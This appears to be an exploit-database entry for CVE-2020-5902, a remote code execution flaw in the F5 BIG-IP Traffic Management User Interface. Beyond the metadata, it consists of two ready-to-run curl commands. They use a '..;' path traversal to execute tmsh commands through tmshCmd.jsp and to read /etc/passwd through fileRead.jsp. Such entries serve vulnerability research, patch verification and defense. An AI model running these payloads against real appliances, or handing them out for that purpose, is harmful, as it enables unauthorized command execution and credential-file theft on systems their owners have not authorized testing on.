EXPLOITS

BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)

Author: Budi Khoirudin
type: webapps
platform: linux
port: 
date_added: 2020-07-07  
date_updated: 2022-11-04  
verified: 0  
codes: CVE-2020-5902  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 48643.txt  

## RCE:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

## Read File:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'